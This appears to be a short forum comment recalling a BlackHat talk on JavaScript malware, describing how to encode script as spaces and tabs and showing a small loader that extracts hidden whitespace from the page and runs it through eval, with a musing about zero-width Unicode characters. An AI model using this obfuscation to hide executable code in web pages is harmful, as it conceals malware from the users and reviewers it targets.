I gave a talk at BlackHat many years ago about JS malware, and proposed obfuscating malicious JS like this:
- Treat JS code like 7-bit ASCII
- For each character, convert the bits into white space. 1= space, 0 = tab
- A = "1000001" = space tab tab tab tab tab space
- concat it all together, \n shows you are done
So you can represent JS code as just whitespace. Which means this is malicious code:
<script>
//st4rt
//3nd
var html = document.body.innerHTML;
var start = html.indexOf("//st" + "4rt");
var end = html.indexOf("3" + "nd");
var code = html.substring(start+12, end);
eval(hydrate(code));
</script>
I like that a lot. I wonder if it might be possible to use Unicode zero width space and zero width non-joiner characters.. Then there wouldn't even be any white space to see.